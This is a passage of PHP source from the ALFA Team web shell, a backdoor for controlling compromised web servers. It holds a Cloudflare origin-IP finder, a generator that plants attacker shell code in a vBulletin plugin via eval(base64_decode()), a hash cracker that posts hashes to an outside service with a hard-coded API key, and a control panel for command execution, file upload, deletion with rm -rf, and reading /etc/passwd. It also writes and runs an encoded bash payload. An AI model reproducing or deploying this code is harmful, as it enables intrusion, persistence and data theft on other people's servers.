2795function alfacloudflare(){
2796alfahead();
2797AlfaNum(8,9,10,7,6,5,4,3);
2798echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
2799<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
2800if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
2801$url = $_POST['alfa1'];
2802if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
2803$url = preg_replace('/^(https?):\/\//', '', $url);
2804$url = "http://www.".$url;
2805}
2806$headers = @get_headers($url, 1);
2807$server = $headers['Server'];
2808$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
2809if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
2810if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
2811$url = explode($matches[0], $url);
2812$url = $url[1];}}
2813if(is_array($server))$server = $server[0];
2814echo __pre();
2815if(preg_match('/cloudflare/i', $server))
2816echo "\n[+] CloudFlare detected: {$server}\n<br>";
2817else
2818echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
2819echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
2820echo "[+] Searching for more IP addresses.\n\n<br><br>";
2821for($x=0;$x<count($subs);$x++){
2822$site = $subs[$x] . $url;
2823$ip = is_ipv4(gethostbyname($site));
2824if($ip == '(Null)')
2825continue;
2826echo "Trying {$site}: {$ip}\n<br>";
2827}
2828echo "\n[+] Finished.\n<br>";
2829}
2830echo '</div>';
2831alfafooter();
2832}
2833function is_ipv4($ip){
2834return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
2835}
2836function __alert($s){
2837echo '<center>'.__pre().$s.'</center>';
2838}
2839function create_table($data){
2840echo '<table border="1">';
2841foreach ($data as $key => $val){
2842$array = array();
2843foreach($val as $k => $v){
2844$array[$k] = $v;
2845}
2846echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
2847}
2848echo '</table>';
2849}
2850function alfaphp2xml(){
2851alfahead();
2852AlfaNum(8,9,10,7,6,5,4,3);
2853echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
2854<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
2855<input type='submit' name='go' value=' ' /></p></form></center>";
2856if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
2857echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
2858echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
2859echo '</textarea></center></p>';
2860}
2861echo '</center></div>';
2862alfafooter();
2863}
2864function alfacpcrack(){
2865alfahead();
2866echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
2867if($_POST['alfa1']=='dec'){
2868$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
2869echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
2870<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
2871foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
2872echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2873if($_POST['alfa3'] == '>>'){
2874$hash = $_POST['alfa2'];
2875if(!empty($hash)){
2876$hash_type = $_POST['alfa4'];
2877$email = "solevisible@gmail.com";
2878$code = "7b9fa79f92c3cd96";
2879$target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
2880$resp = @file_get_contents($target);
2881if($resp==''){
2882$get = new AlfaCURL();
2883$resp = $get->Send($target);
2884}
2885echo __pre().'<center>';
2886switch($resp){
2887 case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
2888 case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
2889 case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
2890 case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
2891}
2892if(substr($resp,0,4)!='CODE'&&$resp!=''){
2893echo "<b>Result: <font color='green'>".$resp."</font></b>";
2894}elseif(substr($resp,0,4)!='CODE'){
2895echo "<font color='red'>NoT Found</font><br />";
2896}
2897echo('</center>');
2898}
2899}
2900}
2901if($_POST['alfa1']=='analyzer'){
2902echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
2903<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
2904<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2905if($_POST['alfa3'] == '>>'){
2906$hash = $_POST['alfa2'];
2907if(!empty($hash)){
2908$curl = new AlfaCURL();
2909$resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
2910echo(__pre().'<center>');
2911if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
2912 echo('<font color="green">'.$s[1].'</font>');
2913}else{
2914 echo('<font color="red">Not Found...!</font>');
2915}
2916echo('</center><br>');
2917}
2918}
2919}
2920echo '</div>';
2921alfafooter();
2922}
2923function alfafooter(){
2924if(!isset($_POST['ajax'])){
2925echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
2926<tr>
2927<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
2928<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
2929<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
2930<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
2931</tr>
2932<tr>
2933<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
2934<td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
2935</tr>
2936<tr>
2937<td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
2938</tr>
2939<tr>
2940<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
2941<input type='hidden' name='a' value='FilesMAn'>
2942<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
2943<input type='hidden' name='alfa1' value='uploadFile'>
2944<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
2945<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong> Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam © 2012-".date('Y')." ]</span></td>
2946</tr>
2947</table>
2948</div>
2949<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>
2950<div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>
2951<div id='update-content'></div>
2952<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>
2953<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
2954<script>
2955 $('search-input').addEventListener('keydown', function(e){
2956 setTimeout(function(){
2957 var string = $('search-input').value
2958 d.getElementsByClassName('history-list')[0].innerHTML = '';
2959 for(var i in editor_files){
2960 if(editor_files[i].file.search(string) != -1 || string == ''){
2961 var mode = 0;
2962 if(i == editor_current_file){
2963 mode = ' is_active';
2964 }
2965 insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
2966 }
2967 }
2968 }, 100);
2969 },false);
2970 _Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
2971 d.body.insertAdjacentHTML('beforeend', res);
2972 });
2973 if(".$GLOBALS["need_to_update_header"]."){
2974 _Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){
2975 try{
2976 var data = JSON.parse(res);
2977 console.log(data);
2978 for(var i in data){
2979 var html = '';
2980 for(var b = 0; b < data[i].length; b++){
2981 if(i=='useful'||i=='downloader'){
2982 html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';
2983 }else{
2984 html += data[i][b];
2985 }
2986 }
2987 var elem = $('header_'+i);
2988 if(elem){elem.innerHTML = html;}
2989 }
2990 $('header_cgishell').innerHTML = 'ON';
2991 $('header_cgishell').setAttribute('class', 'header_on');
2992 }catch(e){console.log(e)}
2993 });
2994 }else if(islinux){
2995 _Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){
2996 if(res=='ok'){
2997 $('header_cgishell').innerHTML = 'ON';
2998 $('header_cgishell').setAttribute('class', 'header_on');
2999 }
3000 });
3001 }
3002</script>
3003</body>
3004</html>
3005";
3006}}
3007if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
3008function posix_getpwuid($p) {return false;} }
3009if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
3010function posix_getgrgid($p) {return false;} }
3011function alfaWhich($p) {
3012$path = alfaEx('which ' . $p,false,false);
3013if(!empty($path))
3014return strlen($path);
3015return false;
3016}
3017function alfaSize($s) {
3018if($s >= 1073741824)
3019return sprintf('%1.2f', $s / 1073741824 ). ' GB';
3020elseif($s >= 1048576)
3021return sprintf('%1.2f', $s / 1048576 ) . ' MB';
3022elseif($s >= 1024)
3023return sprintf('%1.2f', $s / 1024 ) . ' KB';
3024else
3025return $s . ' B';
3026}
3027function alfaPerms($p) {
3028if (($p & 0xC000) == 0xC000)$i = 's';
3029elseif (($p & 0xA000) == 0xA000)$i = 'l';
3030elseif (($p & 0x8000) == 0x8000)$i = '-';
3031elseif (($p & 0x6000) == 0x6000)$i = 'b';
3032elseif (($p & 0x4000) == 0x4000)$i = 'd';
3033elseif (($p & 0x2000) == 0x2000)$i = 'c';
3034elseif (($p & 0x1000) == 0x1000)$i = 'p';
3035else $i = 'u';
3036$i .= (($p & 0x0100) ? 'r' : '-');
3037$i .= (($p & 0x0080) ? 'w' : '-');
3038$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
3039$i .= (($p & 0x0020) ? 'r' : '-');
3040$i .= (($p & 0x0010) ? 'w' : '-');
3041$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
3042$i .= (($p & 0x0004) ? 'r' : '-');
3043$i .= (($p & 0x0002) ? 'w' : '-');
3044$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
3045return $i;
3046}
3047function alfaPermsColor($f,$isbash=false){
3048$class = "";
3049$num = "";
3050$human = "";
3051if($isbash){
3052$class = $f["class"];
3053$num = $f["num"];
3054$human = $f["human"];
3055}else{
3056$num = substr(sprintf('%o', @fileperms($f)),-4);
3057$human = alfaPerms(@fileperms($f));
3058if(!@is_readable($f))
3059$class = "main_red_perm";
3060elseif (!@is_writable($f))
3061$class = "main_white_perm";
3062else
3063$class = "main_green_perm";
3064}
3065return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
3066}
3067if(!function_exists("scandir")) {
3068function scandir($dir) {
3069$dh = opendir($dir);
3070while (false !== ($filename = readdir($dh)))
3071$files[] = $filename;
3072return $files;
3073}
3074}
3075function reArrayFiles($file_post){
3076$file_ary = array();
3077$file_count = count($file_post['name']);
3078$file_keys = array_keys($file_post);
3079for ($i=0; $i<$file_count; $i++) {
3080foreach ($file_keys as $key) {
3081$file_ary[$i][$key] = $file_post[$key][$i];
3082}
3083}
3084return $file_ary;
3085}
3086function _alfa_can_runCommand($cgi=true,$cache=true){
3087 if(isset($_SESSION["alfa_canruncmd"])&&$cache){
3088 return true;
3089 }
3090 if(strlen(alfaEx("whoami",false,$cgi))>0){
3091 $_SESSION["alfa_canruncmd"] = true;
3092 return true;
3093 }
3094 return false;
3095}
3096function _alfa_symlink($target, $link){
3097 $phpsym = function_exists("symlink");
3098 if($phpsym){
3099 @symlink($target, $link);
3100 }else{
3101 alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
3102 }
3103}
3104function _alfa_file_exists($file,$cgi=true){
3105 if(@file_exists($file)){
3106 return true;
3107 }else{
3108 if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
3109 return true;
3110 }
3111 }
3112 return false;
3113}
3114function _alfa_file($file,$cgi=true){
3115 $array = @file($file);
3116 if(!$array){
3117 if(strlen(alfaEx("id",false,$cgi))>0){
3118 $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
3119 if(strlen($data)>0){
3120 return explode("\n", $data);
3121 }else{
3122 return false;
3123 }
3124 }else{
3125 return false;
3126 }
3127 }else{
3128 return $array;
3129 }
3130}
3131function _alfa_is_writable($file){
3132 $check = false;
3133 $check = @is_writable($file);
3134 if(!$check){
3135 if(_alfa_can_runCommand()){
3136 $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
3137 if($check == "yes"){
3138 $check = true;
3139 }else{
3140 $check = false;
3141 }
3142 }
3143 }
3144 return $check;
3145}
3146function _alfa_is_dir($dir,$mode="-d"){
3147 $check = false;
3148 $check = @is_dir($dir);
3149 if(!$check){
3150 if(_alfa_can_runCommand()){
3151 $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
3152 if($check == "yes"){
3153 return true;
3154 }else{
3155 return false;
3156 }
3157 }
3158 }
3159 return $check;
3160}
3161function alfaFilesMan(){
3162alfahead();
3163AlfaNum(8,9,10,7,6,5,4);
3164echo '<div class="ajaxarea"><div class="header">';
3165if(!empty ($_COOKIE['f']))
3166$_COOKIE['f'] = @unserialize($_COOKIE['f']);
3167if(!empty($_POST['alfa1'])){
3168switch($_POST['alfa1']){
3169case 'uploadFile':
3170if(isset($GLOBALS['glob_chdir_false'])){
3171 $alfa_canruncmd = _alfa_can_runCommand(true,true);
3172 $move_cmd_file = true;
3173}
3174$files = reArrayFiles($_FILES['f']);
3175foreach($files as $file){
3176if($move_cmd_file){
3177 alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
3178}else{
3179 @move_uploaded_file($file['tmp_name'],$file['name']);
3180}
3181echo "uped...!<Br>";
3182}
3183break;
3184case 'mkdir':
3185$new_dir_cmd = false;
3186if(isset($GLOBALS['glob_chdir_false'])){
3187 if(_alfa_can_runCommand(true,true)){
3188 alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
3189 }
3190}else{
3191if(!@mkdir(trim($_POST['alfa2'])))
3192echo "<b><font color='red'>Can't create new dir !</b></font>";
3193}
3194break;
3195case 'delete':
3196function deleteDir($path){
3197$path = (substr($path,-1)=='/') ? $path:$path.'/';
3198$dh = @opendir($path);
3199while(($item = @readdir($dh)) !== false){
3200$item = $path.$item;
3201if((basename($item) == "..") || (basename($item) == "."))
3202continue;
3203$type = @filetype($item);
3204if ($type == "dir")
3205deleteDir($item);
3206else
3207@unlink($item);
3208}
3209@closedir($dh);
3210@rmdir($path);
3211}
3212if(is_array(@$_POST['f']))
3213foreach($_POST['f'] as $f){
3214if($f == '..')
3215continue;
3216$f = rawurldecode($f);
3217if(isset($GLOBALS["glob_chdir_false"])){
3218 if(_alfa_can_runCommand(true,true)){
3219 alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
3220 }
3221}else{
3222alfaEx("rm -rf '".addslashes($f)."'",false,false);
3223if(@is_dir($f))
3224deleteDir($f);
3225else
3226@unlink($f);
3227}
3228}
3229if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
3230deleteDir(rawurldecode(@$_POST['alfa2']));
3231alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
3232}else{
3233@unlink(rawurldecode(@$_POST['alfa2']));
3234}
3235if(isset($GLOBALS["glob_chdir_false"])){
3236 $source = rawurldecode(@$_POST['alfa2']);
3237 if($source!='..'&&!empty($source)){
3238 if(_alfa_can_runCommand(true,true)){
3239 alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
3240 }
3241 }
3242}
3243break;
3244case 'paste':
3245if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){
3246function copy_paste($c,$s,$d){
3247if(@is_dir($c.$s)){
3248@mkdir($d.$s);
3249$h = @opendir($c.$s);
3250while (($f = @readdir($h)) !== false)
3251if (($f != ".") and ($f != ".."))
3252copy_paste($c.$s.'/',$f, $d.$s.'/');
3253} elseif(is_file($c.$s))
3254@copy($c.$s, $d.$s);
3255}
3256foreach($_SESSION['f'] as $f)
3257copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
3258}elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){
3259function move_paste($c,$s,$d){
3260if(@is_dir($c.$s)){
3261@mkdir($d.$s);
3262$h = @opendir($c.$s);
3263while (($f = @readdir($h)) !== false)
3264if(($f != ".") and ($f != ".."))
3265copy_paste($c.$s.'/',$f, $d.$s.'/');
3266}elseif(@is_file($c.$s))
3267@copy($c.$s, $d.$s);
3268}
3269foreach($_SESSION['f'] as $f)
3270@rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
3271}elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){
3272if(class_exists('ZipArchive')){
3273$zip = new ZipArchive();
3274$zipX = "alfa_".rand(1,1000).".zip";
3275if($zip->open($zipX, 1)){
3276@chdir($_SESSION['c']);
3277foreach($_SESSION['f'] as $f){
3278if($f == '..')continue;
3279if(@is_file($_SESSION['c'].$f))
3280$zip->addFile($_SESSION['c'].$f, $f);
3281elseif(@is_dir($_SESSION['c'].$f)){
3282$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
3283foreach($iterator as $key=>$value){
3284$key = str_replace('\\','/',realpath($key));
3285if(@is_dir($key)){
3286if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
3287}else{$zip->addFile($key,$key);}}}}
3288@chdir($GLOBALS['cwd']);
3289$zip->close();
3290__alert('>> '.$zipX.' << is created...');}}
3291}elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){
3292if(class_exists('ZipArchive')){
3293$zip = new ZipArchive();
3294foreach($_SESSION['f'] as $f) {
3295if($zip->open($_SESSION['c'].$f)){
3296$zip->extractTo($GLOBALS['cwd']);
3297$zip->close();}}}}
3298unset($_SESSION['f']);
3299break;
3300default:
3301if(!empty($_POST['alfa1'])){
3302$_SESSION['act'] = @$_POST['alfa1'];
3303$_SESSION['f'] = @$_POST['f'];
3304$_SESSION['c'] = @$_POST['c'];
3305}
3306break;
3307}
3308}
3309if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){
3310 $dirContent = @scandir($_SESSION[__LAST_CWD__]);
3311}else{
3312 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
3313 if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
3314 $path = explode('/', $res[1]);
3315 array_pop($path);
3316 $_POST['c'] = implode('/', $path);
3317 }
3318 $_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);
3319}
3320$cmd_dir = false;
3321if($dirContent === false){
3322 if(_alfa_can_runCommand(true,true)){
3323 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
3324 if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){
3325 $bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
3326 alfaWriteTocgiapi("getdir.alfa",$bash);
3327 }
3328 if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";
3329 $dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");
3330 $dirContent = json_decode($dirContent, true);
3331 if(is_array($dirContent)){
3332 array_pop($dirContent);
3333 $cmd_dir = true;
3334 }else{
3335 $dirContent = false;
3336 }
3337 $_SESSION["alfachdir_bash"] = true;
3338 }
3339}
3340if($dirContent == false){
3341echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
3342alfaFooter();
3343return;
3344}
3345global $sort;
3346$sort = array('name', 1);
3347if(!empty($_POST['alfa1'])) {
3348if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
3349$sort = array($match[1], (int)$match[2]);
3350}
3351echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
3352$dirs = $files = array();
3353$n = count($dirContent);
3354for($i=0;$i<$n;$i++){
3355if($cmd_dir){
3356$filename = $dirContent[$i]["name"];
3357$file_owner = $dirContent[$i]["owner"];
3358$file_group = $dirContent[$i]["group"];
3359$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
3360$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
3361$file_size = $dirContent[$i]["size"];
3362$file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];
3363}else{
3364$filename = $dirContent[$i];
3365$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
3366$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
3367$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
3368$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
3369$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
3370$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
3371$file_size = @filesize($GLOBALS['cwd'].$filename);
3372$file_path = $GLOBALS['cwd'].$filename;
3373}
3374$tmp = array('name' => $filename,
3375'path' => $file_path,
3376'modify' => $file_modify,
3377'perms' => $file_perm,
3378'size' => $file_size,
3379'owner' => $file_owner,
3380'group' => $file_group
3381);
3382if(!$cmd_dir){
3383if(@is_file($file_path))
3384$files[] = array_merge($tmp, array('type' => 'file'));
3385elseif(@is_link($file_path))
3386$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
3387elseif(@is_dir($file_path)&& ($filename != "."))
3388$dirs[] = array_merge($tmp, array('type' => 'dir'));
3389}else{
3390 if($dirContent[$i]["type"]=="file"){
3391 $files[] = array_merge($tmp, array('type' => 'file'));
3392 }else{
3393 if($dirContent[$i]["name"] != "."){
3394 $dirs[] = array_merge($tmp, array('type' => 'dir'));
3395 }
3396 }
3397}
3398}
3399$GLOBALS['sort'] = $sort;
3400function alfaCmp($a, $b) {
3401if($GLOBALS['sort'][0] != 'size')
3402return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
3403else
3404return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
3405}
3406usort($files, "alfaCmp");
3407usort($dirs, "alfaCmp");
3408$files = array_merge($dirs, $files);
3409$l=0;
3410$cc=0;
3411foreach($files as $f){
3412$f['name'] = htmlspecialchars($f['name']);
3413$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
3414$checkbox = 'checkbox'.$cc;
3415$raw_name = rawurlencode($f['name']);
